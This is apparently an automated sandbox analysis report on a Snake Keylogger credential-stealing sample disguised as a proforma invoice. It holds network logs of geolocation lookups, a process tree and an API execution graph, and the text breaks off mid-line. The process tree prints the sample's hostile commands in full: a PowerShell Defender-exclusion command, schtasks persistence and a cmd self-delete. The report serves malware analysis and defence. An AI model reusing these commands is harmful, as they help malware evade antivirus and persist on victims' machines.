                                            2024-11-18 17:18:57 UTC63OUTGET /xml/155.94.241.187 HTTP/1.1
                                            Host: reallyfreegeoip.org
                                            2024-11-18 17:18:57 UTC858INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 17:18:57 GMT
                                            Content-Type: text/xml
                                            Content-Length: 358
                                            Connection: close
                                            Cache-Control: max-age=31536000
                                            CF-Cache-Status: HIT
                                            Age: 6375
                                            Last-Modified: Mon, 18 Nov 2024 15:32:42 GMT
                                            Accept-Ranges: bytes
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KR4PgRjZvmy35gu7cgicKG5VpQRYkyEv0XV82y%2BuKykwS5k6%2B%2B%2B9iwghQ7mm%2FOaKVoTMTjJhbbS5J9P%2BdoToM%2BneAm1ph1BJIrYgDE%2F61wwu2Y4k8qBq5xyipReXYlgkBEVVB76o"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 8e499f6b2e4f7be1-ATL
                                            alt-svc: h3=":443"; ma=86400
                                            server-timing: cfL4;desc="?proto=TCP&rtt=20125&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=143501&cwnd=32&unsent_bytes=0&cid=0a75b70d373e23bd&ts=223&x=0"
                                            2024-11-18 17:18:57 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                                            Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            13192.168.2.849739188.114.97.34435420C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 17:18:59 UTC87OUTGET /xml/155.94.241.187 HTTP/1.1
                                            Host: reallyfreegeoip.org
                                            Connection: Keep-Alive
                                            2024-11-18 17:18:59 UTC849INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 17:18:59 GMT
                                            Content-Type: text/xml
                                            Content-Length: 358
                                            Connection: close
                                            Cache-Control: max-age=31536000
                                            CF-Cache-Status: HIT
                                            Age: 51813
                                            Last-Modified: Mon, 18 Nov 2024 02:55:26 GMT
                                            Accept-Ranges: bytes
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SmdLQejwTNkw%2B%2F2WK%2FsYEbOGgcAMj0BesUa0jxGfEJKGw5dOzbwxXTBptJX12oBT3Y7gb4abBzRLxMbUzIUUnYe1CafVaHfUbqiZVNgxBIIJoJ7SWBThCZTqN1piXyfBtYg7aX83"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 8e499f774bd6798a-DEN
                                            alt-svc: h3=":443"; ma=86400
                                            server-timing: cfL4;desc="?proto=TCP&rtt=18606&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=155740&cwnd=32&unsent_bytes=0&cid=4d3b8426f0ca3def&ts=174&x=0"
                                            2024-11-18 17:18:59 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                                            Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            14192.168.2.849741188.114.97.34435420C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 17:19:01 UTC63OUTGET /xml/155.94.241.187 HTTP/1.1
                                            Host: reallyfreegeoip.org
                                            2024-11-18 17:19:01 UTC854INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 17:19:01 GMT
                                            Content-Type: text/xml
                                            Content-Length: 358
                                            Connection: close
                                            Cache-Control: max-age=31536000
                                            CF-Cache-Status: HIT
                                            Age: 6379
                                            Last-Modified: Mon, 18 Nov 2024 15:32:42 GMT
                                            Accept-Ranges: bytes
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pA6KaBroP7BLrCkuM%2F2Ff7D3X99jdWvLQDJFYUq6oVwtZ7kf02cxve6gJOFn0ThINm%2BtTlNnAT89rv0L%2B1cCoLrSrjDKidPQWER%2FOpk0%2BlAF%2FI0S9RapVXOmZ57bqcWC7EktIeid"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 8e499f809cedafa2-ATL
                                            alt-svc: h3=":443"; ma=86400
                                            server-timing: cfL4;desc="?proto=TCP&rtt=17784&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=161471&cwnd=32&unsent_bytes=0&cid=3b7f959fdcd45122&ts=179&x=0"
                                            2024-11-18 17:19:01 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                                            Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            15192.168.2.849743188.114.97.34435420C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 17:19:03 UTC63OUTGET /xml/155.94.241.187 HTTP/1.1
                                            Host: reallyfreegeoip.org
                                            2024-11-18 17:19:03 UTC846INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 17:19:03 GMT
                                            Content-Type: text/xml
                                            Content-Length: 358
                                            Connection: close
                                            Cache-Control: max-age=31536000
                                            CF-Cache-Status: HIT
                                            Age: 6381
                                            Last-Modified: Mon, 18 Nov 2024 15:32:42 GMT
                                            Accept-Ranges: bytes
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ms6eaZ5i9SOs5kQRULyQWI22gMkPgJsI%2BATYYA7vWCr3wdll2bDz6ooCfJq%2FWuEUX2lHGtLe6vf1n3MElcqSySWLYhULGgR5GhNQrNgpDimVFKr1PR9qHuvhXxAFHtWChtLwz1r7"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 8e499f914ccd4507-ATL
                                            alt-svc: h3=":443"; ma=86400
                                            server-timing: cfL4;desc="?proto=TCP&rtt=19429&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=152920&cwnd=32&unsent_bytes=0&cid=a11617510cd5b55b&ts=192&x=0"
                                            2024-11-18 17:19:03 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                                            Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                                            Click to jump to process

                                            Click to jump to process

                                            Click to dive into process behavior distribution

                                            Click to jump to process

                                            Target ID:0
                                            Start time:12:18:36
                                            Start date:18/11/2024
                                            Path:C:\Users\user\Desktop\PROFORMA + PENDENTES.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\PROFORMA + PENDENTES.exe"
                                            Imagebase:0x3b0000
                                            File size:617'984 bytes
                                            MD5 hash:4D74CEBD8DDAAE78DE8144F1ABB245E5
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1484282889.0000000003791000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.1484282889.0000000003791000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1484282889.0000000003791000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.1484282889.0000000003791000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                            Reputation:low
                                            Has exited:true

                                            Target ID:3
                                            Start time:12:18:40
                                            Start date:18/11/2024
                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PROFORMA + PENDENTES.exe"
                                            Imagebase:0x3e0000
                                            File size:433'152 bytes
                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:4
                                            Start time:12:18:40
                                            Start date:18/11/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff6ee680000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:5
                                            Start time:12:18:41
                                            Start date:18/11/2024
                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe"
                                            Imagebase:0x3e0000
                                            File size:433'152 bytes
                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:6
                                            Start time:12:18:41
                                            Start date:18/11/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff6ee680000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:7
                                            Start time:12:18:41
                                            Start date:18/11/2024
                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WYqxTmjfOgdZ" /XML "C:\Users\user\AppData\Local\Temp\tmp3E72.tmp"
                                            Imagebase:0x270000
                                            File size:187'904 bytes
                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:8
                                            Start time:12:18:41
                                            Start date:18/11/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff6ee680000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:9
                                            Start time:12:18:42
                                            Start date:18/11/2024
                                            Path:C:\Users\user\Desktop\PROFORMA + PENDENTES.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Users\user\Desktop\PROFORMA + PENDENTES.exe"
                                            Imagebase:0x90000
                                            File size:617'984 bytes
                                            MD5 hash:4D74CEBD8DDAAE78DE8144F1ABB245E5
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:low
                                            Has exited:true

                                            Target ID:10
                                            Start time:12:18:42
                                            Start date:18/11/2024
                                            Path:C:\Users\user\Desktop\PROFORMA + PENDENTES.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Users\user\Desktop\PROFORMA + PENDENTES.exe"
                                            Imagebase:0x2f0000
                                            File size:617'984 bytes
                                            MD5 hash:4D74CEBD8DDAAE78DE8144F1ABB245E5
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:low
                                            Has exited:true

                                            Target ID:11
                                            Start time:12:18:42
                                            Start date:18/11/2024
                                            Path:C:\Users\user\Desktop\PROFORMA + PENDENTES.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\PROFORMA + PENDENTES.exe"
                                            Imagebase:0x8f0000
                                            File size:617'984 bytes
                                            MD5 hash:4D74CEBD8DDAAE78DE8144F1ABB245E5
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.1626917322.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000B.00000002.1626917322.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000B.00000002.1626917322.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 0000000B.00000002.1626917322.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000B.00000002.1630241690.0000000002D71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:true

                                            Target ID:12
                                            Start time:12:18:44
                                            Start date:18/11/2024
                                            Path:C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe
                                            Imagebase:0x5e0000
                                            File size:617'984 bytes
                                            MD5 hash:4D74CEBD8DDAAE78DE8144F1ABB245E5
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Antivirus matches:
                                            • Detection: 100%, Avira
                                            • Detection: 100%, Joe Sandbox ML
                                            • Detection: 32%, ReversingLabs
                                            Reputation:low
                                            Has exited:true

                                            Target ID:13
                                            Start time:12:18:44
                                            Start date:18/11/2024
                                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                            Imagebase:0x7ff605670000
                                            File size:496'640 bytes
                                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                            Has elevated privileges:true
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:false

                                            Target ID:14
                                            Start time:12:18:48
                                            Start date:18/11/2024
                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WYqxTmjfOgdZ" /XML "C:\Users\user\AppData\Local\Temp\tmp5B41.tmp"
                                            Imagebase:0x270000
                                            File size:187'904 bytes
                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:15
                                            Start time:12:18:48
                                            Start date:18/11/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff6ee680000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:16
                                            Start time:12:18:48
                                            Start date:18/11/2024
                                            Path:C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe"
                                            Imagebase:0x960000
                                            File size:617'984 bytes
                                            MD5 hash:4D74CEBD8DDAAE78DE8144F1ABB245E5
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000010.00000002.1691929548.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Has exited:true

                                            Target ID:18
                                            Start time:12:18:57
                                            Start date:18/11/2024
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\PROFORMA + PENDENTES.exe"
                                            Imagebase:0xa40000
                                            File size:236'544 bytes
                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:19
                                            Start time:12:18:57
                                            Start date:18/11/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff6ee680000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:20
                                            Start time:12:18:57
                                            Start date:18/11/2024
                                            Path:C:\Windows\SysWOW64\choice.exe
                                            Wow64 process (32bit):true
                                            Commandline:choice /C Y /N /D Y /T 3
                                            Imagebase:0x7b0000
                                            File size:28'160 bytes
                                            MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:21
                                            Start time:12:19:03
                                            Start date:18/11/2024
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe"
                                            Imagebase:0xa40000
                                            File size:236'544 bytes
                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:22
                                            Start time:12:19:03
                                            Start date:18/11/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff6ee680000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:23
                                            Start time:12:19:03
                                            Start date:18/11/2024
                                            Path:C:\Windows\SysWOW64\choice.exe
                                            Wow64 process (32bit):true
                                            Commandline:choice /C Y /N /D Y /T 3
                                            Imagebase:0x7b0000
                                            File size:28'160 bytes
                                            MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Reset < >

                                              Execution Graph

                                              Execution Coverage:11.2%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:6.8%
                                              Total number of Nodes:177
                                              Total number of Limit Nodes:10
                                              execution_graph 26672 7081038 26673 70811c3 26672->26673 26674 708105e 26672->26674 26674->26673 26677 70812b8 PostMessageW 26674->26677 26679 70812b0 26674->26679 26678 7081324 26677->26678 26678->26674 26680 70812b8 PostMessageW 26679->26680 26681 7081324 26680->26681 26681->26674 26471 25ae398 26472 25ae3de 26471->26472 26475 25ae578 26472->26475 26478 25adc70 26475->26478 26479 25ae5e0 DuplicateHandle 26478->26479 26480 25ae4cb 26479->26480 26667 6e4cec6 26668 6e4ce70 26667->26668 26669 6e4f440 12 API calls 26668->26669 26670 6e4f430 12 API calls 26668->26670 26671 6e4f49e 12 API calls 26668->26671 26669->26668 26670->26668 26671->26668 26682 25a4668 26683 25a4672 26682->26683 26685 25a4763 26682->26685 26686 25a477d 26685->26686 26690 25a4868 26686->26690 26694 25a4863 26686->26694 26691 25a488f 26690->26691 26693 25a496c 26691->26693 26698 25a44d4 26691->26698 26695 25a488f 26694->26695 26696 25a44d4 CreateActCtxA 26695->26696 26697 25a496c 26695->26697 26696->26697 26699 25a58f8 CreateActCtxA 26698->26699 26701 25a59bb 26699->26701 26481 6e4cfa7 26482 6e4cef0 26481->26482 26486 6e4f440 26482->26486 26503 6e4f49e 26482->26503 26521 6e4f430 26482->26521 26487 6e4f45a 26486->26487 26488 6e4f47e 26487->26488 26538 70800f0 26487->26538 26544 70802de 26487->26544 26549 708043a 26487->26549 26554 7080007 26487->26554 26560 7080040 26487->26560 26566 70802cf 26487->26566 26571 7080129 26487->26571 26577 7080248 26487->26577 26582 7080494 26487->26582 26587 7080534 26487->26587 26595 7080332 26487->26595 26600 70806b2 26487->26600 26605 70805f2 26487->26605 26610 70806f1 26487->26610 26488->26482 26504 6e4f42c 26503->26504 26505 6e4f4a1 26503->26505 26506 7080248 2 API calls 26504->26506 26507 7080129 2 API calls 26504->26507 26508 6e4f47e 26504->26508 26509 70802cf 2 API calls 26504->26509 26510 7080040 2 API calls 26504->26510 26511 7080007 2 API calls 26504->26511 26512 708043a 2 API calls 26504->26512 26513 70802de 2 API calls 26504->26513 26514 70800f0 2 API calls 26504->26514 26515 70806f1 2 API calls 26504->26515 26516 70805f2 2 API calls 26504->26516 26517 70806b2 2 API calls 26504->26517 26518 7080332 2 API calls 26504->26518 26519 7080534 4 API calls 26504->26519 26520 7080494 2 API calls 26504->26520 26505->26482 26506->26508 26507->26508 26508->26482 26509->26508 26510->26508 26511->26508 26512->26508 26513->26508 26514->26508 26515->26508 26516->26508 26517->26508 26518->26508 26519->26508 26520->26508 26522 6e4f45a 26521->26522 26523 6e4f47e 26522->26523 26524 7080248 2 API calls 26522->26524 26525 7080129 2 API calls 26522->26525 26526 70802cf 2 API calls 26522->26526 26527 7080040 2 API calls 26522->26527 26528 7080007 2 API calls 26522->26528 26529 708043a 2 API calls 26522->26529 26530 70802de 2 API calls 26522->26530 26531 70800f0 2 API calls 26522->26531 26532 70806f1 2 API calls 26522->26532 26533 70805f2 2 API calls 26522->26533 26534 70806b2 2 API calls 26522->26534 26535 7080332 2 API calls 26522->26535 26536 7080534 4 API calls 26522->26536 26537 7080494 2 API calls 26522->26537 26523->26482 26524->26523 26525->26523 26526->26523 26527->26523 26528->26523 26529->26523 26530->26523 26531->26523 26532->26523 26533->26523 26534->26523 26535->26523 26536->26523 26537->26523 26540 70800f9 26538->26540 26539 70801a1 26539->26488 26540->26539 26615 6e4ca3c 26540->26615 26619 6e4ca48 26540->26619 26545 70802f0 26544->26545 26623 6e4c700 26545->26623 26627 6e4c6f8 26545->26627 26546 708022e 26550 7080452 26549->26550 26631 6e4bd00 26550->26631 26635 6e4bd08 26550->26635 26551 7080467 26551->26488 26556 708001e 26554->26556 26555 70801a1 26555->26488 26556->26555 26558 6e4ca3c CreateProcessA 26556->26558 26559 6e4ca48 CreateProcessA 26556->26559 26557 7080206 26557->26488 26558->26557 26559->26557 26562 7080073 26560->26562 26561 70801a1 26561->26488 26562->26561 26564 6e4ca3c CreateProcessA 26562->26564 26565 6e4ca48 CreateProcessA 26562->26565 26563 7080206 26563->26488 26564->26563 26565->26563 26567 7080344 26566->26567 26639 6e4c1f0 26567->26639 26643 